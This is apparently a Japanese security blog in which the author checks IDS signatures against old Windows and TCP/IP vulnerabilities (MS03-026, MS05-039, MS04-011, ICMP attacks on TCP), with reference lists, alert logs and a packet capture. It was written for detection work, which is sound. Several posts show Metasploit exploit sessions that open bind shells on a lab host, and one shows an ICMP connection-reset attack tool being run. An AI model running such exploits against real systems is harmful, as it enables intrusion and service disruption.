つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

■コメント

現在は、単体の攻撃ではなく、Botワームに組み込まれて使用されるケースが大半です。

実証コードを使用して検証しました。結果リモートから接続できることを確認しました。

■シグネチャの説明
RPC DCOM interface buffer overflow
http://www.iss.net/security_center/static/12629.php




■実証コード

・コード:広く一般に公開されております。

msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 135 The target port

Payload: Name Default Description
-------- -------- ------- -----------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh
required LPORT 4444 Listening port for bind shell

Target: Windows NT SP3-6a/2K/XP/2K3 English ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Splitting RPC request into 7 packets
[*] Got connection from 192.168.221.11:1878 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1

C:\WINNT\system32>



■Proventiaでの検知(IDS)

MSRPC_RemoteActivate_Bo



■参考資料

BugTraq Mailing List, Wed Jul 16 2003 - 23:27:27 CDT
[LSD] Critical security vulnerability in Microsoft Operating Systems
http://archives.neohapsis.com/archives/bugtraq/2003-07/0194.html

Internet Security Systems Security Alert #147
Flaw in Microsoft Windows RPC Implementation
http://xforce.iss.net/xforce/alerts/id/147

CERT Vulnerability Note VU#568148
Microsoft Windows RPC vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/568148

CERT Advisory CA-2003-16
Buffer Overflow in Microsoft RPC
http://www.cert.org/advisories/CA-2003-16.html

Microsoft Security Bulletin MS03-026
Buffer Overrun In RPC Interface Could Allow Code Execution (823980)
http://www.microsoft.com/technet/security/bulletin/ms03-026.mspx

VulnWatch Mailing List, Thu Jul 17 2003 - 16:04:40 CDT
Re: [LSD] Critical security vulnerability in Microsoft Operating Systems
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0036.html

BugTraq Mailing List, Sun Jul 20 2003 - 14:01:13 CDT
Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2003-07/0255.html

CIAC Information Bulletin N-117
Microsoft RPC Interface Buffer Overrun Vulnerability
http://www.ciac.org/ciac/bulletins/n-117.shtml

Core Security Technologies Advisory CORE-2003-12-05
DCE RPC Vulnerabilities New Attack Vectors Analysis
http://archives.neohapsis.com/archives/bugtraq/2003-12/0166.html

Hewlett-Packard Company Security Bulletin HPSBTU01051
SSRT4741 rev 0 DCE for HP Tru64 UNIX Potential RPC Buffer Overrun Attack
http://lists.virus.org/bugtraq-0406/msg00422.html

Hewlett-Packard Company Security Bulletin HPSBOV01056
SSRT4741 Rev.0 DCE for HP OpenVMS Potential RPC Buffer Overrun Attack
http://www.securitylab.ru/46406.html

Microsoft Security Bulletin MS05-012
Vulnerability in OLE and COM Could Allow Remote Code Execution (873333)
http://www.microsoft.com/technet/security/bulletin/MS05-012.mspx

Microsoft Security Bulletin MS04-012
Cumulative Update for Microsoft RPC/DCOM (828741)
http://www.microsoft.com/technet/security/bulletin/MS04-012.mspx

Microsoft Security Bulletin MS03-039
Buffer Overrun In RPCSS Service Could Allow Code Execution (824146)
http://www.microsoft.com/technet/security/bulletin/ms03-039.mspx

Microsoft Security Bulletin MS05-051
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)
http://www.microsoft.com/technet/security/Bulletin/MS05-051.mspx

Microsoft Security Bulletin MS03-039
Buffer Overrun In RPCSS Service Could Allow Code Execution (824146)
http://www.microsoft.com/technet/security/bulletin/ms03-039.mspx

CVE
CVE-2003-0352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352





AD
いいね!した人  |  リブログ(0)

テーマ:

■コメント

この攻撃は、ADSLや光回線などの一般ユーザをターゲットとしております。

また、攻撃の大半は、botワームによるものです。

実証コードについて検証を行いました。攻撃が成功し、リモートから接続出来ることを確認しました。


■シグネチャの説明

http://xforce.iss.net/xforce/xfdb/19705


■スキャンツール

http://www.foundstone.com/resources/freetooldownload.htm?file=MS05039Scan.zip


■実証コード

・コード:広く一般に公開されております。

msf ms05_039_pnp(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------- --------------- ------------------------------------
---
required RHOST 192.168.221.180 The target address
required SMBPIPE browser Pipe name: browser, srvsvc, wkssvc
optional SMBDOM The domain for specified SMB usernam
e
required RPORT 139 The target port
optional SMBUSER The SMB username to connect with
optional SMBPASS The password for specified SMB usern
ame

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0-SP4

msf ms05_039_pnp(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target ()
[*] Sending 1 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.221.11:1689 <-> 192.168.221.180:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.37.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.37.1

C:\WINNT\system32>


■Proventiaでの検知(IDS)

PlugAndPlay_BO


■参考情報

http://www.isskk.co.jp/support/techinfo/general/win_plugandplay_202.html



■検知状況

2005-12-17 18:04:38 JST PlugAndPlay_BO ***.45.186.15 ***762 192.168.221.180 445
2005-12-17 18:23:12 JST PlugAndPlay_BO ***.45.186.15 ***695 192.168.221.180 445
2005-12-17 18:57:04 JST PlugAndPlay_BO ***.45.186.15 ***242 192.168.221.180 445
2005-12-17 22:09:13 JST PlugAndPlay_BO ***.111.150.190 2396 192.168.221.180 445
2005-12-18 01:38:08 JST PlugAndPlay_BO ***.229.109.44 4338 192.168.221.180 445
2005-12-18 04:06:31 JST PlugAndPlay_BO ***.45.186.15 62236 192.168.221.180 445
2005-12-18 05:17:31 JST PlugAndPlay_BO ***.45.186.15 63902 192.168.221.180 445
2005-12-18 07:19:51 JST PlugAndPlay_BO ***.45.186.15 62***8 192.168.221.180 445
2005-12-18 20:14:38 JST PlugAndPlay_BO ***.168.245.101 2128 192.168.221.180 445
2005-12-18 22:21:46 JST PlugAndPlay_BO ***.45.79.119 3652 192.168.221.180 445
2005-12-18 22:32:33 JST PlugAndPlay_BO ***.45.8.186 4821 192.168.221.180 445
2005-12-19 08:30:00 JST PlugAndPlay_BO ***.89.54.63 1***98 192.168.221.180 445
2005-12-19 10:04:09 JST PlugAndPlay_BO ***.118.53.35 63730 192.168.221.180 445
2005-12-19 11:02:54 JST PlugAndPlay_BO ***.191.105.91 1202 192.168.221.180 139
2005-12-19 12:44:09 JST PlugAndPlay_BO ***.183.93.241 4995 192.168.221.180 139
2005-12-19 14:52:54 JST PlugAndPlay_BO ***.125.201.6 3179 192.168.221.180 445
2005-12-19 14:57:52 JST PlugAndPlay_BO ***.95.178.1 1404 192.168.221.180 445
2005-12-19 15:33:19 JST PlugAndPlay_BO ***.125.201.6 3068 192.168.221.180 445
2005-12-19 16:48:12 JST PlugAndPlay_BO ***.***.12.70 2700 192.168.221.180 445
2005-12-19 17:16:09 JST PlugAndPlay_BO ***.125.194.95 2063 192.168.221.180 445
2005-12-19 20:17:05 JST PlugAndPlay_BO ***.32.173.37 3576 192.168.221.180 445
2005-12-19 21:45:44 JST PlugAndPlay_BO ***.11.57.209 3033 192.168.221.180 139
2005-12-20 15:45:57 JST PlugAndPlay_BO ***.136.194.185 4890 192.168.221.180 139
2005-12-20 15:54:33 JST PlugAndPlay_BO ***.202.29.58 4165 192.168.221.180 445
2005-12-20 16:51:56 JST PlugAndPlay_BO ***.139.99.9 3198 192.168.221.180 445
2005-12-20 18:03:10 JST PlugAndPlay_BO ***.68.231.97 4185 192.168.221.180 445
2005-12-20 20:31:51 JST PlugAndPlay_BO ***.189.132.214 3974 192.168.221.180 139
2005-12-20 21:18:16 JST PlugAndPlay_BO ***.124.***.35 1678 192.168.221.180 445
2005-12-20 23:13:50 JST PlugAndPlay_BO ***.220.240.85 63216 192.168.221.180 445
2005-12-20 23:34:25 JST PlugAndPlay_BO ***.125.18.232 1175 192.168.221.180 445
2005-12-21 09:06:36 JST PlugAndPlay_BO ***.125.197.202 4698 192.168.221.180 445
2005-12-21 11:***:22 JST PlugAndPlay_BO ***.190.121.114 1721 192.168.221.180 445
2005-12-21 12:15:34 JST PlugAndPlay_BO ***.125.197.202 4081 192.168.221.180 445
2005-12-21 12:36:48 JST PlugAndPlay_BO ***.188.221.99 2925 192.168.221.180 445
2005-12-21 14:10:01 JST PlugAndPlay_BO ***.125.204.250 22*** 192.168.221.180 445
2005-12-21 14:52:50 JST PlugAndPlay_BO ***.125.197.202 3701 192.168.221.180 445
2005-12-21 14:58:06 JST PlugAndPlay_BO ***.125.204.250 4013 192.168.221.180 445
2005-12-21 15:27:34 JST PlugAndPlay_BO ***.125.204.250 3084 192.168.221.180 445
2005-12-21 15:31:43 JST PlugAndPlay_BO ***.222.7.34 2424 192.168.221.180 445
2005-12-21 16:11:28 JST PlugAndPlay_BO ***.125.197.202 2492 192.168.221.180 445
2005-12-21 16:44:37 JST PlugAndPlay_BO ***.97.33.80 2934 192.168.221.180 139
2005-12-21 16:***:40 JST PlugAndPlay_BO ***..68.225.3 4451 192.168.221.180 445
2005-12-21 18:22:07 JST PlugAndPlay_BO ***.125.213.*** 2696 192.168.221.180 445






AD
いいね!した人  |  リブログ(0)

テーマ:

■コメント

2004年4月30日にこの脆弱性を利用した攻撃の増加を検知していました。

http://www.cyberpolice.go.jp/important/2004/20040430_084140.html


■シグネチャの説明

http://www.iss.net/security_center/static/12380.php

http://www.isskk.co.jp/support/techinfo/general/MS_SSL_168.html


■実証コード

・コード:広く一般に公開されております。


msf windows_ssl_pct(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ --------------- ------------------------------------
-
required RHOST 192.168.221.180 The target address
required RPORT 443 The target port
optional PROTO raw The application protocol (raw or smt
)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0

msf windows_ssl_pct(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP0
[*] Sending 376 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.


■Proveintaでの検知

SSL_PCT1_Overflow


■参考資料

Microsoft Security Bulletin MS04-011
Security Update for Microsoft Windows (835732)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Internet Security Systems Security Advisory, April 13, 2004
Microsoft SSL Library Remote Compromise Vulnerability
http://xforce.iss.net/xforce/alerts/id/168

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows
http://www.ciac.org/ciac/bulletins/o-114.shtml

CERT Vulnerability Note VU#586540
Microsoft Private Communication Technology (PCT) fails to properly validate message inputs
http://www.kb.cert.org/vuls/id/586540

SecuriTeam Mailing List, Windows focus 22 Apr 2004
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
http://www.securiteam.com/windowsntfocus/5CP0L0KCKO.html

Internet Security Systems Security Alert, April 13, 2004
Multiple Vulnerabilities in Microsoft Products
http://xforce.iss.net/xforce/alerts/id/169

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows [REVISED 25 Jun 2004]
http://www.ciac.org/ciac/bulletins/o-114.shtml

CVE
CVE-2003-0719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719

AD
いいね!した人  |  リブログ(0)

テーマ:

■コメント

複数のベンダーでTCP/IPに脆弱性があり、サービス不能攻撃を受ける恐れがあります。

この脆弱性を利用した攻撃を検知する為のシグネチャです。



■シグネチャの説明

ICMPタイプ3(目的地手の届かない)コード2(プロトコル手の届かない)を検出します。

http://www.iss.net/security_center/static/17170.php



■実証コード

[root@linux ICMP_Protocol_Unreachable_TCP]# ./HOD-icmp-attacks-poc

(MS05-019) (CISCO:20050412)
ICMP attacks against TCP (Proof-of-Concept)

Copyright (c) 2004-2005 .: houseofdabus :.


Usage:

./HOD-icmp-attacks-poc <-fi:SRC-IP> <-ti:VICTIM-IP> <-fi:SRC-PORT> [-tp:int] [-a:int] [-n:int]

-fi:IP From (sender) IP address
-ti:IP To (target) IP address
-fp:int Target open TCP port number
(for example - 21, 25, 80)
-tp:int Inicial value for bruteforce (sender) TCP port number
(default: 0 = range of ports 0-65535)
-n:int Number of packets

-a:int ICMP attacks:
1 - Blind connection-reset attack
(ICMP protocol unreachable)
2 - Path MTU discovery attack
(slow down the transmission rate)
3 - ICMP Source Quench attack
[root@linux ICMP_Protocol_Unreachable_TCP]# ./HOD-icmp-attacks-poc -ti:192.168.221.180 -tp:80

(MS05-019) (CISCO:20050412)
ICMP attacks against TCP (Proof-of-Concept)

Copyright (c) 2004-2005 .: houseofdabus :.


[*] From IP: <192.168.0.1>, port: 80
[*] To IP: <192.168.221.180>, port: 80
[*] Count: 1



■Proventiaでの検知(IDS)


ICMP_Protocol_Unreachable_TCP


■参考情報

Internet-Draft of ICMP attacks
ICMP attacks against TCP draft-gont-tcpm-icmp-attacks-00.txt
http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt

OpenBSD 3.4 errata Web site
027: RELIABILITY FIX: August 25, 2004
http://www.openbsd.org/errata34.html

LWN.net Web site
LWN: 2.6.9-rc3 long-format changelog
http://lwn.net/Articles/104532/

Cisco Web site
Cisco IP Phone 7970G Release Notes for Firmware Release 6.0(1) SR1 for Cisco CallManager Versions 3.3 and 4.0
http://www.cisco.com/univercd/cc/td/doc/product/voice/c_ipphon/english/ipp7970/relnote/797060s1.htm

Gont's Web site
ICMP attacks against TCP
http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html

NISCC Vulnerability Advisory 532967
Vulnerability Issues in ICMP packets with TCP payloads
http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en

Cisco Security Advisory 2005 April 12 1200 UTC (GMT)
Crafted ICMP Messages Can Cause Denial of Service
http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml

Microsoft Security Bulletin MS05-019
Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)
http://www.microsoft.com/technet/security/Bulletin/MS05-019.mspx

Secunia Security Advisory: SA14904
Cisco Various Products ICMP Message Handling Denial of Service
http://secunia.com/advisories/14904/

CERT Vulnerability Note VU#222750
Network Appliance Information for VU#222750
http://www.kb.cert.org/vuls/id/JGEI-69DM7V

NetApp Web site
NetApp On the Web
http://now.netapp.com/

Secunia Security Advisory: Sa14950
Juniper Networks JUNOS ICMP Message Handling Denial of Service
http://secunia.com/advisories/14950/

Secunia Security Advisory: SA14937
Network Appliance Data ONTAP ICMP Message Handling Denial of Service
http://secunia.com/advisories/14937/

Internet-Draft of ICMP attacks
ICMP attacks against TCP draft-gont-tcpm-icmp-attacks-03.txt
http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-03.txt

SecurityTracker Alert ID: 1013696
VxWorks ICMP Processing Errors Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Apr/1013696.html

SecurityTracker Alert ID: 1013698
WatchGuard Firebox ICMP Processing Errors Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Apr/1013698.html

CIAC INFORMATION BULLETIN P-177
Vulnerabilities in TCP-IP (893066)
http://www.ciac.org/ciac/bulletins/p-177.shtml

CIAC INFORMATION BULLETIN P-181
Cisco Products Vulnerable to DoS via Crafted ICMP Messages
http://www.ciac.org/ciac/bulletins/p-181.shtml

BugTraq Mailing List, Thu May 26 2005 - 12:08:50 CDT
[security bulletin] SSRT4884 rev.0 - HP-UX TCP/IP Remote Denial of Service (DoS)
http://archives.neohapsis.com/archives/bugtraq/2005-05/0301.html

Hewlett-Packard Company Web site
IT Resource Center - login / register
http://www1.itrc.hp.com/service/cki/secBullArchive.do?admint=-682735245+1116276188578+28353475

SecurityTracker Alert ID: 1014505
HP Tru64 TCP/IP ISN and ICMP Processing Flaws Let Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014505.html

Secunia Security Advisory: SA16126
Blue Coat Products ICMP Message Handling Denial of Service
http://secunia.com/advisories/16126/

Blue Coat Security Advisory July 19, 2005
Security Advisory: ICMP Error Message Vulnerabilities
http://www.bluecoat.com/support/knowledge/advisory_icmp_error_message_vulnerabilities.html

SecurityTracker Alert ID: 1014534
Blue Coat ProxySG Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014534.html

BlueCoat Download Web page
ProxySG Secure Proxy Appliance
http://download.bluecoat.com/release/SGOS3/index.html

SecurityTracker Alert ID: 1014533
Blue Coat Spyware Interceptor Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014533.html

SecurityTracker Alert ID: 1014532
Blue Coat Director Error in Processing TCP Sequence Numbers in ICMP Messages Lets Remote Users Deny Service
http://www.securitytracker.com/alerts/2005/Jul/1014532.html

CVE
CVE-2004-0790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790

いいね!した人  |  リブログ(0)

テーマ:

■コメント

Macromedia Flashバージョン7.0 .19 .0には、脆弱性があり、特殊に作られたDoActionタグを入れてある悪意があるSWFファイルがロードされる事によりサービス妨害を引き起こす恐れがあります。



■シグネチャの説明

http://www.iss.net/security_center/static/23022.php

このシグネチャは、2005年1月11日にXPU24.27がリリースされました。

http://www.isskk.co.jp/support/XPressUpdates/proventiaG/RSNS7X24_27RNj.html



■実証コード

・コード:広く一般に公開されております。

・影響:コードが実行された場合、ieがエラーを吐いて落ちます。


■Proventiaでの検知(IDS)


Flash_ActionDefineFunction_Name_BO


■参考情報

SEC-CONSULT Security Advisory 20051107-1
Macromedia Flash Player ActionDefineFunction Memory Corruption
http://www.sec-consult.com/226.html

Macromedia Flash Player Download Center Web page
Macromedia Flash Player Download Center Windows
http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

Macromedia Security Bulletin MPSB05-07
Flash Player 7 Improper Memory Access Vulnerability
http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html

CVE
CVE-2005-3591
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3591


いいね!した人  |  リブログ(0)

テーマ:

■シグネチャの説明

http://xforce.iss.net/xforce/xfdb/20783



■Proventiaでの検知(IDS)


MS05-054


■参考情報

Secunia Security Advisory: SA15546
Microsoft Internet Explorer "window()" Denial of Service Weakness
http://secunia.com/advisories/15546/

Microsoft Internet Explorer Web page
Internet Explorer Home
http://www.microsoft.com/windows/ie/default.mspx

FrSIRT Security Advisory FrSIRT/ADV-2005-2509
Microsoft Internet Explorer "window()" Code Execution Vulnerability
http://www.frsirt.com/english/advisories/2005/2509

Microsoft Security Advisory (911302)
Vulnerability in the way Internet Explorer Handles onLoad Events Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/911302.mspx

CERT Vulnerability Note VU#887861
Microsoft Internet Explorer vulnerable to code execution via scripting "window()" object
http://www.kb.cert.org/vuls/id/887861

Internet Security Systems Protection Alert, November 22, 2005
Internet Explorer Javascript Window() Remote Code Execution
http://xforce.iss.net/xforce/alerts/id/209

CVE
CVE-2005-1790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790


いいね!した人  |  リブログ(0)

テーマ:

■コメント

脆弱性などを利用したオープンさせたポートに対して、リモートから接続する際検知します。

Port7777など不明なポートへの接続を検知した場合は、対象通信について確認する事をお勧めします。



■シグネチャの説明

http://xforce.iss.net/xforce/xfdb/12903



■Proventiaでの検知(IDS)

Microsoft_Windows_Shell_Banner


■パケット

N/A



いいね!した人  |  リブログ(0)

テーマ:

■シグネチャの説明

http://xforce.iss.net/xforce/xfdb/22467




■Proventiaでの検知(IDS)

1211_06



■MS05-051スキャンツール

http://www.foundstone.com/resources/freetooldownload.htm?file=MS05051Scan.zip



■パケット

No. Time Source Destination Protocol Info
203 2005-12-12 09:18:55.591631 211.91.125.137 192.168.37.180 TCP 6000 > 1025 [SYN] Seq=0 Ack=0 Win=16384 Len=0 MSS=1414

Frame 203 (58 bytes on wire, 58 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 6000 (6000), Dst Port: 1025 (1025), Seq: 0, Ack: 0, Len: 0

No. Time Source Destination Protocol Info
204 2005-12-12 09:18:55.592299 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 204 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
205 2005-12-12 09:18:58.822890 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 205 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
211 2005-12-12 09:19:05.401692 192.168.37.180 211.91.125.137 TCP 1025 > 6000 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 211 (60 bytes on wire, 60 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 6000 (6000), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
212 2005-12-12 09:19:34.724297 211.91.125.137 192.168.37.180 TCP 6000 > 1025 [RST] Seq=1 Ack=1077123615 Win=0 Len=0

Frame 212 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 6000 (6000), Dst Port: 1025 (1025), Seq: 1, Ack: 1077123615, Len: 0

No. Time Source Destination Protocol Info
220 2005-12-12 09:20:37.130134 211.91.125.137 192.168.37.180 TCP 2193 > 1025 [SYN] Seq=0 Ack=0 Win=16384 Len=0 MSS=1414

Frame 220 (62 bytes on wire, 62 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 0, Ack: 0, Len: 0

No. Time Source Destination Protocol Info
221 2005-12-12 09:20:37.130972 192.168.37.180 211.91.125.137 TCP 1025 > 2193 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460

Frame 221 (62 bytes on wire, 62 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 2193 (2193), Seq: 0, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
222 2005-12-12 09:20:37.380023 211.91.125.137 192.168.37.180 TCP 2193 > 1025 [ACK] Seq=1 Ack=1 Win=16968 Len=0

Frame 222 (54 bytes on wire, 54 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 1, Ack: 1, Len: 0

No. Time Source Destination Protocol Info
223 2005-12-12 09:20:37.450308 211.91.125.137 192.168.37.180 DCERPC Bind: call_id: 1 UUID: 906b0ce0-c70b-1067-b317-00dd010662da ver 1.0

Frame 223 (126 bytes on wire, 126 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 1, Ack: 1, Len: 72
DCE RPC

No. Time Source Destination Protocol Info
224 2005-12-12 09:20:37.452475 192.168.37.180 211.91.125.137 DCERPC Bind_ack: call_id: 1 accept max_xmit: 5840 max_recv: 5840

Frame 224 (114 bytes on wire, 114 bytes captured)
Ethernet II, Src: 00:0c:29:5f:e0:5b, Dst: 00:d0:c9:96:61:5d
Internet Protocol, Src Addr: 192.168.37.180 (192.168.37.180), Dst Addr: 211.91.125.137 (211.91.125.137)
Transmission Control Protocol, Src Port: 1025 (1025), Dst Port: 2193 (2193), Seq: 1, Ack: 73, Len: 60
DCE RPC

No. Time Source Destination Protocol Info
225 2005-12-12 09:20:37.706247 211.91.125.137 192.168.37.180 DCERPC Request: call_id: 1[Unreassembled Packet]

Frame 225 (1078 bytes on wire, 1078 bytes captured)
Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:5f:e0:5b
Internet Protocol, Src Addr: 211.91.125.137 (211.91.125.137), Dst Addr: 192.168.37.180 (192.168.37.180)
Transmission Control Protocol, Src Port: 2193 (2193), Dst Port: 1025 (1025), Seq: 73, Ack: 61, Len: 1024
[Unreassembled Packet: DCERPC]
Data (1024 bytes)

0000 05 00 00 83 10 00 00 00 2c 05 00 00 01 00 00 00 ........,.......
0010 04 05 00 00 00 00 07 00 e0 0c 6b 90 0b c7 67 10 ..........k...g.
0020 b3 17 00 dd 01 06 62 da 00 00 00 00 00 00 00 00 ......b.........
0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0040 00 00 00 00 06 00 00 00 00 00 00 00 06 00 00 00 ................
0050 31 00 31 00 31 00 31 00 31 00 00 00 07 00 00 00 1.1.1.1.1.......
0060 00 00 00 00 07 00 00 00 31 00 31 00 31 00 31 00 ........1.1.1.1.
0070 31 00 31 00 00 00 00 00 58 02 00 00 00 00 00 00 1.1.....X.......
0080 2b 02 00 00 cc cc cc cc cc 00 cc 00 cc 00 cc 00 +...............
0090 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00a0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00b0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00c0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00d0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00e0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
00f0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0100 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0110 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0120 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0130 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0140 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0150 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0160 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0170 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0180 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
0190 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
01a0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
01b0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
01c0 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 cc 00 ................
